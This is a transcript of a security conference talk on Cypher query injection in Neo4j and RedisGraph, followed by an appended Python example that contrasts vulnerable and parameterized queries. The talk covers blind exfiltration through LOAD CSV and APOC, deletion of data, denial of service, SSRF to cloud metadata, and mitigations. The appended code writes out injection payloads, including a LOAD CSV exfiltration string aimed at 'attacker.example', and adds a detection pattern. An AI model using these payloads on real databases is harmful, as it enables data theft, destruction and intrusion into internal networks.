Cypher Query Injection - the new "SQL Injection" we aren't aware of by Noy Pearl

BSides TLV · 35:25 · 1.9K views · Published 2022-07
Category: Technical · Style: Talk

Transcript [en]:

Okay, thank you for the introduction, by the way. Okay, I'll just test the clicker because I have luck... okay, I have luck today, I hope. Hi everyone, my name is Noy and I'm super excited to be right here. First of all, I want to thank everyone who actually stayed up until now, I really appreciate it, I know that's like a difficult challenge. Today I'm going to talk about Cypher injection. So my name is Noy, and basically I started this research like one year ago, and I just googled for Cypher injections and I found like one and a half articles about it, and I was like, what? But we can't have an

injection... So my whole goal today is that, like half a year from now, everyone in this audience will be able to just publish a bug bounty write-up of Cypher injection. That's it. So basically we're going to talk about what it is exactly. You don't really have to know what SQL injection is, but just to make sure: this is not about SQL injection, there is one slide about it, this is about Cypher injection. So let's start. So I'm working as a security researcher, I was one of the members in the group of Tom Rezait who created capture-the-flag challenges, and I really like to research stuff and to learn about new stuff, and I also

really like to dance, especially after I find the vulnerability, and I have like the best dog ever in my opinion, but it's more accurate to say that he actually owns me. Okay, so I want you to actually have five takeaways out of this talk today. I really want each one of you to know what is Cypher and what are graph databases. I want you to actually be able to inject into those graph databases and to be able to escalate your attack even further than that, to cause as much damage as you can, or as much damage as I possibly could during my research. I really want you to understand how to protect from these kinds of injections

and also how to minimize the attack surface in case you have an injection like that. And eventually, not only the talk, I also want to give you some tools to understand what you do right now: I wrote some cool playground which I really want you to use. But we have a lot to talk about, so let's start. Cypher: so forget for 40 minutes about everything you know about the word cipher. We're not talking about Caesar cipher or any cipher of crypto, we're talking about something different, we're talking about openCypher. Now this is just a query language that you use, so you write queries in Cypher language and those queries are written to graph databases, so they perform some actions

on graph databases, and this is basically how you use it. So no SQL again, only Cypher right here, and whenever I say Cypher query injection, whenever I say Cypher, I actually mean openCypher. So let's proceed. I really wanted to understand what is a graph database, because I said these two words too many times up until now. So let's take for example a relational database: we have those tables and rows and columns that you're already familiar with. And we have a graph database: now there is a circle, you can call it a node, and there is an arrow between two nodes, you can call it a relationship. So there is actually... you can read that SpongeBob

lives at Pineapple House, and this is just how the database looks like: no rows, no tables. And if you look at the bottom right you can see that there is Neo4j, this is one of the biggest companies that use graph databases nowadays. There is RedisGraph, which is just an extension: you can actually write Cypher queries that perform actions on a Redis database. And there is also Amazon Neptune, which also supports Cypher queries, so it's pretty cool, and there are many more databases that nowadays are starting to support Cypher. And Neo4j actually open-sourced Cypher and they actually made this openCypher, so whenever I say openCypher I actually mean Cypher query. Okay, so we talked about graph databases

and basically what is Cypher, but we want to know much more about Cypher, and again, this is not SQL, this is Cypher, this is something that is pretty new to most of us. So in order to do this I just created the world of SpongeBob in a database, and you can see right here that there are nodes of characters such as Mr. Krabs and SpongeBob, and there are nodes of places such as Krusty Krab, Sandy's Treedome, Chum Bucket, and this is how a graph database actually looks like. So you can see that, for example, if we take SpongeBob, who is a friend of Sandy, who lives at Sandy's Treedome, this is just a relationship between those nodes,

and basically this is how we actually see those graph databases. So we talked about how it looks like, about that it's not like a table, but let's understand and dig into the actual interesting terms of Cypher or even of graph databases. So we talked about nodes and relationships already: we can have an arrow between two nodes, and the direction doesn't really matter in our case, in all of this talk. And at the bottom you can see some query; dismiss MATCH and RETURN for a second. There is a variable that you can actually define in your Cypher query, you can call it c right here. There are labels that you can use, so there is a Character label,

somewhat like a type of a node, and there are properties you can actually assign to nodes, so you can assign name and age and birthday to SpongeBob's node. And basically that's it, those are the basic terms of Cypher. Now if we look at a query example of Cypher, then instead of the SELECT FROM we have MATCH and RETURN. So for example, if you want, in a Cypher query, to get all the characters, then we will write a query to match a c variable that will bring back all the nodes with the type Character, and return c. We have to use RETURN after MATCH so that Cypher knows what we want to get back from the result of the query,

and if you want, for example, to get a character by a specific name, we use the same MATCH and then a WHERE clause, so for example WHERE c.name equals 'SpongeBob' RETURN c. So this is like the basic example of how to use Cypher. Okay, so we talked pretty much too much about Cypher, we just want to dig into the actually interesting stuff that most of us came here for: the actual attack, the actual exploitation, and the leverage of the functionalities. Let's just start with SQL. I promise this will be the only slide about SQL, this is not a SQL talk, but let's just do a very quick brief about what is SQL injection. We have an

example right here of a query in SQL where we just get all the characters from a database where the name equals some value. Imagine that this SpongeBob value actually comes from the user, so that's the user input. In this case we'll bring back to the user only the data of SpongeBob, but in the case that the user is actually an attacker, instead of SpongeBob they will insert something like SpongeBob and a double quote, and then we'll insert a term that will return true always, and two dashes to comment out the rest of the query. So what will actually happen right here is that for each one of the rows in the table it will be checked whether the

name is SpongeBob or whether one equals one, and since one equals one returns true regardless of the name, we will have this injection, we will have this exploit, and we'll be able to get other information we shouldn't have gotten. So basically this is just SQL injection in a nutshell, and we're gonna use this knowledge from this slide to actually inject into Cypher. Okay, so let's get back into Cypher injection. We have a pretty much similar query, but in Cypher: so we want to get all the characters that have some specific name that we get from the user, so the name equals some user input, and in this case there is a legitimate user who just inputs the SpongeBob value, so

we bring back the node that has the name SpongeBob. Pretty much boring, let's go into the really interesting part. Now in Cypher, instead of SpongeBob the attacker will insert something like SpongeBob with a single quote, and then again we'll insert a term that will return true always, and RETURN c with two slashes to comment out the rest of the query. So what will happen right here is that we will get not only SpongeBob's node but other nodes as well, and we just inserted the injection. So notice that all the red background text will actually be the injection, and this is what an attacker should probably insert. But you can just stop me right now and say:

okay, we have to know to inject RETURN c; we're an attacker from outside, we have no idea that there is a variable defined that's called c, so how would we know to insert RETURN c as the injection? And I will tell you that you're totally right, this is an issue that we are going to overcome in a few slides, so keep that in mind and let's keep on with the injections for now, but we're going to solve this issue. Okay, the next thing that an attacker can actually do is to use this injection not only to get other data but to actually be able to tamper with our other data, so he or she will insert DELETE c,

and then what will happen is that the actual node will be deleted. And this is like a pretty similar injection, but we want to do more damage throughout all this talk, so let's see how we can just delete everything and not only our own poor node. What will we insert? This is the same example as before, but this time we will insert something like this. Now, all of this red background text will be the actual injection: we will insert again SpongeBob with a single quote to end the string, and then we'll insert two clauses. The first one will be MATCH with (all:Character), so we will create a variable called all to get all the nodes that

have the Character label, and then we'll insert the DELETE, so we will be able to delete all the characters. So again we will do two actions right here: first of all we will get all the characters and then we will delete all the characters, and this will be our injection. But we don't see the query. I mean, I'm returning to the previous question that I avoided: we don't actually know that there is a RETURN c, I mean we don't know to inject RETURN c, we don't know that there is a label called Character in the database, because we are an attacker from outside, we have no idea how the database actually looks like. So how can we still be able to inject

something? Because obviously we have to use this RETURN but still not break the query. Let's see how we're gonna do it. We're gonna exfiltrate data eventually, we're gonna just leak data to outside, and we're gonna do this by leveraging a very legitimate functionality in Neo4j called LOAD CSV. Now again, Neo4j is just one of the biggest graph databases today, and if you search for graph databases most chances they will come up like top three or top one. So we're gonna use the LOAD CSV functionality of Neo4j in order to deal with the issue that we had previously, that we're not able to see the query. We're gonna use this, so let's see how we're gonna use it. We have this

functionality and all it does is just importing data from another external CSV file. So, for example, you want to insert data of 20,000 records: you don't type it manually, you just use the CSV, so you will load from this CSV, and by that you'll be able to use the data. This is very legitimate, but what it does is that it enables you to use in the query a method that enables us to actually send a GET request to an external service, and that is huge. It means that we can define any service we want, and a GET request will be sent using our injection. Now let's see actually how we can use it.

But basically we have a case of blind injection right here, where we are actually able to inject into a query but we're not able to see the actual response that is returned. So for that we get help from LOAD CSV, so we use it as a kind of a pipe between the actual database and our own controlled server, so we'll be able to leak data from the injection to outside, to us. But let's see how we can actually do it. So I know this is a lot of text, but we actually insert those four lines as the injection; dismiss the last line. What we actually do here will be to run a procedure called db.labels, which

actually returns back all the labels in the database to us. Then we use LOAD CSV FROM and we put our own URL to our own server, and we will append the label at the end of the URL. So what will actually happen is there will be a GET request to our own server with the leaked labels, and the two slashes, of course, at the end of the injection to comment out the rest of the query. But this is what we will see if we just use, for example, Burp Suite's Collaborator to see the request: we will get a request to our own server with the leaked label from the injection, from the database, and as you can see in the second line, the User-

Agent is actually NeoLoadCSV Java, which means that the GET request was sent directly from the injection that we made, with the help of LOAD CSV in Neo4j. So using this technique we can just leak more and more parts of the database. Now we know that there is a label called Character, we insert MATCH (c:Character), and again all of this will be in the injection, and then we'll use LOAD CSV FROM with the URL to our own server; apoc.text.join, we'll dismiss this for a second, but keys(c) we'll see. So keys will actually return all the properties of the character, and apoc.text.join is just to transform the list

to a string so we can append it at the end of the URL. And this is basically what we will return to get back all the properties, so we'll be able to leak also the name property outside, and for each one of the properties in the database we will get another GET request, and again it was from LOAD CSV, Neo4j, so pretty cool. The last thing that we want to leak will be actually the values, the values of SpongeBob and Patrick. So we know that there is a label called Character, we know that there is a property called name, we want to leak right now c.name, that you see at the end of the second line.

We will leak Patrick and Mr. Krabs, with a simple typo I made, but basically we will be able to leak the values of the actual names, and by that even delete what we want, because right now we leaked anything we wanted from the database and we'd be able to tamper and just exfiltrate data as we wish. So we were able to bypass this issue of not being able to see what we inject. But as I said in the beginning, we want to cause as much damage as we can during all this talk, and it's not enough for us to just destroy the database, to delete data, we want to do much more. So let's see what else we can do. We're

going to escalate the attack and cause denial of service, we're going to prevent access to the database, we're going to perform SSRF and RFI, and I'm going to explain why it is when we reach those slides, but basically we're going to access sensitive information, files, and leak data outside, and even access hidden endpoints. We're gonna eventually cause lateral movement, in such a way that we'll be able to leak other data from other services, not only the service that is vulnerable to the injection itself, and we're gonna also talk about AWS, GCP and what else we can leak when we have access to a machine in the cloud itself. So we're gonna show how it can do all

those things, and eventually we're gonna talk about alternatives to LOAD CSV and what we can do in other databases as well, and not only with LOAD CSV in Neo4j. Okay, so the first thing that we can actually do in the injection itself: we can call dbms.listConnections, which will actually return back all the connection IDs to us. We will put this in the injection itself and we will use LOAD CSV to leak all the connection IDs to us, and the next thing will be to either kill a connection or kill a list of connections. Now the connections are not the simple connections between the user and applications, those are actually the powerful connections between the server

and the database itself, and if we do so in an automated script, imagine that it can just cause denial of service on the database and prevent a lot of queries of legitimate users from being executed. Now I will say that it really depends on the roles and permissions that you actually have: if you have the default role of admin you will be able to do so with a simple injection with LOAD CSV, but we're going to talk much more about the roles and permissions. Basically we can just drop databases, so we can leak the names of the databases with the LOAD CSV trick and then we can just drop a database. So we were able to cause denial of service

on the database, we're able to delete data and change data and maybe annoy some users, but still it's not enough for us, so let's see what else we can do. We're gonna perform SSRF right now. Now SSRF is a web-based vulnerability where an attacker actually creates an HTTP request in such a way that is malicious: it reaches through the firewall to the server itself, and because of how the request is constructed, then either the server sends a request to itself or to another internal server, gets the response from it, and then returns the response to the attacker. So it looks just as if the attacker is actually sitting after the firewall and not

behind it, and is able to just manipulate the server into sending a lot of internal requests and access a lot of sensitive files, keys, and endpoints. And we're gonna see how we're gonna do this with LOAD CSV. This is a pretty simple trick, but you can achieve a lot with it. So we can actually cause SSRF with LOAD CSV, and this is an example. So what we will actually do: we have this same case that we talked about, when we actually have an injection in a vulnerable server in Neo4j, we can just use LOAD CSV FROM, but this time we won't use our own server, we use the URL of another internal server, and what will

actually happen right here is that the vulnerable server will send a GET request to one of the internal servers that we will define from the LOAD CSV FROM, and it's pretty powerful: we can access hidden endpoints, we can enumerate directories, we can use common brute-force directories and files that you usually use in bug bounty. And basically, if you want to do something more focused, whether we talk about cloud environments or GCP or AWS, for example in AWS there is a service called the metadata service, which is a service that sits at a static IP and it holds a lot of metadata information about your roles and permissions and with which other machines you can actually communicate

with. So what you can actually do here is, you can use LOAD CSV FROM to query the metadata service, to get a response back, and to be able to know to which other machines you can escalate your attack. So it's pretty much a lot; for example, if you see that you have access to query the Secrets Manager of AWS, then you're able to get a lot of sensitive files and passwords from there, and also you can just escalate through one machine and another if you just know that you can communicate with this other machine in the cloud. So it's pretty much a lot. One fine point to know: in v1 you can do this, but in v2 you cannot, because

in v2 there is a session that you have to establish between the user that wants the permission and the metadata service, so you actually have to attach your own token in the header of the request. And since we use LOAD CSV FROM right here and we cause a GET request, we need to actually find a way to attach this token in the header when we send this request to the metadata service, and it's like funny to think you will have a potential ability to decide on the header that will be sent in the request using LOAD CSV. So I didn't find a way to do so, and it's a nice thing to know

why else you should upgrade to metadata service version 2. So we saw basically the concept, but let's talk about the actual Cypher text. What we can do right here: I have a very cringy version of a server that holds, in some endpoint you should never be able to access externally, some very secret value. And at this point I'm going to say: imagine these endpoints actually sit in another server, not in the server that actually runs Neo4j, the database. What we do right here, all this will be the injection itself, again dismiss the last line, but we will use two LOAD CSV FROM right here. The first one will be to get the actual

secret value from the other server, and as you can see there is a keys.txt at the end. We will save this value as secret, and then we'll use LOAD CSV FROM with the URL to our own server this time, with the secret appended at the end. So what will actually happen right here is that we will get eventually the secret leaked outside to us, and this is a secret that was sitting inside a different server, not in the server that we had the injection on. So this is kind of an example of how we can actually escalate to other machines as well. And notice just one thing: the secret with the index zero is because we use

LOAD CSV, so it actually returns it as a CSV file, but not really, and it doesn't really matter what the type of the file is, it will work regardless if it's CSV or not. Okay, so we talked about a lot here: we talked about Cypher injection and graph databases, denial of service and other fun stuff with SSRF and escalation in the cloud, but I really want to talk for a second about what we actually did after we discovered all those things. So we did responsible disclosure: we actually contacted the Neo4j company and told them about all the risks that you can actually have when you have LOAD CSV enabled, because we didn't find any way to disable LOAD CSV, and we really wanted

a way from them to disable LOAD CSV if we don't use it, so that an attacker won't be able to escalate like that in the cloud. They understood the risk and they're currently working to provide a solution, but unfortunately, since LOAD CSV is defined in Neo4j as a clause and not as a function, currently this is not simple to develop a fix that will let you disable LOAD CSV, because imagine that you cannot, obviously, disable the MATCH clause. So it is actually defined as a clause, this LOAD CSV. You can actually disable all the functions in Neo4j, but again, since LOAD CSV is not a function, as it is defined in Neo4j, then you

cannot actually do it right now. But since they're working on a solution, I was like, okay, they will fix it at some point in the future, people will be able to disable it, I still want to find a way to be able to leak the same information but not with LOAD CSV this time, and this is where the APOC plugin comes into the picture. So I did a little research about what it is exactly: this is just a plugin you can install in Neo4j, and I think it is like the most common plugin in Neo4j, and you can obviously use many more features when you install a plugin. So basically

it's just an extension to the language of Cypher in Neo4j: you can just load, import and export other data. And what I thought was, okay, we can actually use apoc.load.json in a similar way to how we used LOAD CSV, so even if LOAD CSV will be blocked at some point or another, we still have another way. We can use MATCH, for example, with (c:Character), and then call apoc.load.json, and at the end of this third line, in the leaked URL, we will still be able to append the leaked information that we want to use. So the same injection we can actually achieve with a different thing, with the APOC library. It has to be

installed in your actual database so an attacker will be able to use it, but it's very familiar to a lot of developers that actually use Neo4j, and it's just like when you talk about lodash in JavaScript, for example: a lot of people in JavaScript actually use it and install it, so it's pretty common to assume that they probably installed it. And this is just how it looks like when you have your own server and use this injection and you get a request: so you get a request with data JSON with the leaked value, and it will be sent directly from APOC procedures for Neo4j. Okay, so we talked a lot about the injections, a lot about the risk, and

pretty much a lot about what we actually tried to do with Neo4j, but let's really try to make value out of this talk today and understand how we can be protected from those kinds of injections. First of all, in order to be able to write a query as a developer, we have to use parameterized queries, and this is a good example: we have to use MATCH and every kind of clause, but with a parameter inside. So you can see the dollar sign of $name, and we can see that we put the name value in a separate parameter of the function that we run, and it actually means that we take the name that we get from the user and use

it in a parameter in Cypher, so it doesn't matter if the user tries to insert a single quote or a double quote, it will be treated as a parameter in the query and it will be mostly escaped. So a double quote will be treated as if... the double quote, yeah, the double quote character, and not as the character that terminates the string. So this is what we should do if we develop on a graph database and want to avoid injections. And this is not so good, and you should never do this: an example of how we actually are able to write a query in such a way that is prone to injection. We have here, in the second line, string aggregation of the name, we just insert

it like that and don't really do any validation, so the second line, SpongeBob, will be what you shouldn't do. I hope that's clear enough. So okay, we talked about remediation, but we are pretty realistic today and we know that there can come a time when a new developer will arrive and will write some vulnerable query that will be injectable, so we still want to be able to mitigate our attack surface. What we can actually do right here, if we talk about Neo4j: we have role-based access control, we have a very large way to actually define different users, roles and privileges. We can just, for example, if we have a sensitive database that we

want to read data from and we have another less sensitive database that we want to write to, we can use two different users with two different roles: one will have only read permissions on the sensitive database, and the second will have read and write permissions on the less sensitive one, so that if there will be an injection on this sensitive database an attacker will be able only to read and not to write to it or to update. And you have kind of really nice granular roles in Neo4j, so every role is built on top of the previous role with a few more permissions, and you can actually, if you want to be

more protected, revoke some privileges from roles. For example, you can use some role such as editor and then revoke all the permissions to execute functions and procedures on this specific role, just to harden it. And eventually, I really had to add a point about it because I think it's cool: we actually got a suggestion from Neo4j regarding APOC procedures. From version 4.3, yeah, 4.3, we can actually have a block list of any APOC procedures we want, so we can actually define in the configuration of Neo4j a block list of apoc.load and apoc.import, for example, and if we actually don't use APOC we can just uninstall it and by that prevent this kind of scenario.

Okay, so I really want to say something about RedisGraph. So RedisGraph is an extension to Redis that enables you to write Cypher queries, and I really tried to dig into the documentation to understand what you can actually do with it, if you have an equivalent of LOAD CSV with it. I found out that there are parameterized queries, there is support for parameterized queries, so that's great, and I found that there is support for some procedures, db.labels, which can help you if you also want to achieve an injection in RedisGraph. And regarding LOAD CSV, I didn't find LOAD CSV in RedisGraph, but I did find CASE WHEN, which you can use as a kind of an

if, based with substring. So you can, for example, get the labels using db.labels and check whether the first letter of the first label equals 'a', and combine this with OR 1=2 and see the result, or see an error or not, and decide regarding the actual response value of the query. So you can actually achieve this with RedisGraph. And when I tried to dig into RedisGraph more deeply and tried to really understand if we have any way to have roles and permissions in a similar way to Neo4j, I came across this question. I have no idea who this person is, but it's from 2021: a person just begged to have some kind of RBAC like we have

in Neo4j, and I really tried to understand whether or not this was answered, because I didn't find any reference to having role-based access control in RedisGraph. So I didn't find any, maybe there is, but I really didn't find any access control that you have in RedisGraph. Okay, so we talked a lot about injections, Cypher, graph databases, denial of service, SSRF, RedisGraph also, and mitigation and remediation, but I really want you to have value out of this talk, as I said, and not only see those, I hope, nice slides. I really want you to understand how the injections work. So what I did: I created a playground in Cypher, I will put also, I

yeah, I put a QR code at the end, so you don't really need to type it right now, but I really want you to actually clone it. It is all docker-composed, and it just starts up a Neo4j database with data, and RedisGraph, and has a nice Swagger and Postman collections. Just play with it, try to understand how it works, and then either fix existing injections if you're some security engineer or researcher, or just start bug bounty, so you can actually hunt for bugs in Cypher. I didn't find any bug bounty write-up about Cypher, and I hope that like half a month from now it will be much different. It would be really

awesome if it would be that different. And eventually you can just use the remediation and mitigation that we talked about if you're some security engineer, or you can just profit from learning and understanding about another thing that maybe you didn't know before. Also, if you're just a security enthusiast and want to do this Cypher playground, also go ahead. I want to give credit to a person: I found this blog like one year ago, and this is the part of the LOAD CSV cool trick, and this person also wrote kind of like the basic GitHub project that I based my playground on, so thank you for that,

and that's all, so thank you everyone. [Applause] Thank you so much. I would like to say that, yeah, this QR code, it's obvious but I still want to say it: this QR code is actually the Cypher playground at the bottom. Please feel free to talk with me, to tell me what you think, tell me about the playground, and it would be awesome if we just find more articles and write-ups from now on about Cypher. So thank you everyone.
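The following is an added example and is not code from the talk or from the Cypher playground it mentions. It puts the string-built query from the "never do this" slide next to its parameterized fix, assembles the injection payloads described in the talk (the `OR 1=1 RETURN c //` bypass, the delete-everything clause, and the blind LOAD CSV exfiltration of labels and property values) as the exact strings the database would receive, and adds a cheap request-level check that a detection rule could use. The `Character` label and `name` property are the talk's SpongeBob demo data; the `RecordingSession` stand-in for a driver session, the collaborator URL and the detection heuristic are assumptions made here, and nothing connects to a real database.

```python
"""
Added example (not from the talk or its playground). The RecordingSession
stand-in, the collaborator URL and the detection heuristic are assumptions;
the Character label and name property come from the talk's demo data.
"""
import re
from dataclasses import dataclass, field


@dataclass
class RecordingSession:
    """Stand-in for a neo4j driver session (constructed for this example).
    It only records what the application would send; the real driver's
    session.run(query, **parameters) has the same shape."""
    sent: list = field(default_factory=list)

    def run(self, query, **parameters):
        self.sent.append((query, parameters))
        return []


def find_character_unsafe(session, name):
    """The vulnerable pattern: user input spliced into the query text."""
    query = "MATCH (c:Character) WHERE c.name = '" + name + "' RETURN c"
    session.run(query)
    return query


def find_character_safe(session, name):
    """Parameterized: the query text is constant, the value travels as $name
    and is never parsed as Cypher, quotes included."""
    query = "MATCH (c:Character) WHERE c.name = $name RETURN c"
    session.run(query, name=name)
    return query


# Payloads as described in the talk. Each closes the attacker-controlled
# string literal, appends clauses of its own, and hides the original tail of
# the query behind a // comment.
PAYLOAD_BYPASS = "SpongeBob' OR 1=1 RETURN c //"
# DETACH is needed if nodes still have relationships; plain DELETE errors.
PAYLOAD_DELETE_ALL = "SpongeBob' MATCH (all:Character) DETACH DELETE all //"


def exfil_labels_payload(collaborator_url):
    """Blind injection: make the database GET our server once per label,
    with the label in the query string (LOAD CSV as the out-of-band pipe).
    collaborator_url is an assumption, e.g. a Burp Collaborator host."""
    return ("SpongeBob' CALL db.labels() YIELD label "
            "LOAD CSV FROM '" + collaborator_url + "/?l=' + label AS row "
            "RETURN 1 //")


def exfil_property_payload(collaborator_url, label="Character", prop="name"):
    """Same trick one step later: leak one property value per node."""
    return ("SpongeBob' MATCH (x:" + label + ") "
            "LOAD CSV FROM '" + collaborator_url + "/?v=' + x." + prop +
            " AS row RETURN 1 //")


# Request-level check for logs or a WAF rule: known exfil/DoS procedures, or
# an unbalanced single quote followed by a Cypher keyword. A heuristic
# assumed here; it is a detection signal, parameterization is the fix.
_PROCEDURES = re.compile(
    r"\bLOAD\s+CSV\b|\bapoc\.(?:load|import)\.|\bdb\.labels\b"
    r"|\bdbms\.(?:listConnections|killConnections?)\b"
    r"|\bDETACH\s+DELETE\b|\bDROP\s+DATABASE\b",
    re.IGNORECASE,
)
_QUOTE_THEN_KEYWORD = re.compile(
    r"'\s*(?:OR|AND|MATCH|CALL|RETURN|DELETE|WITH|UNWIND)\b", re.IGNORECASE
)


def looks_like_cypher_injection(value):
    """True for the talk's payloads; False for plain names, even ones
    containing an apostrophe such as O'Neil."""
    unbalanced = value.count("'") % 2 == 1
    return bool(_PROCEDURES.search(value)
                or (unbalanced and _QUOTE_THEN_KEYWORD.search(value)))


if __name__ == "__main__":
    for payload in (PAYLOAD_BYPASS, exfil_labels_payload("http://attacker.example")):
        s = RecordingSession()
        print("unsafe sends:", find_character_unsafe(s, payload))
        print("safe sends:  ", find_character_safe(s, payload), "with", s.sent[-1][1])
        print("flagged:     ", looks_like_cypher_injection(payload))
```

Run it to see the difference the talk describes: the unsafe function hands the database a query whose tail (`' RETURN c`) is commented out by the attacker's `//`, while the safe function sends the same constant text every time and the payload only ever appears inside the `name` parameter. The heuristic is deliberately narrow; it is there to surface attempts in request logs, not to replace parameterization.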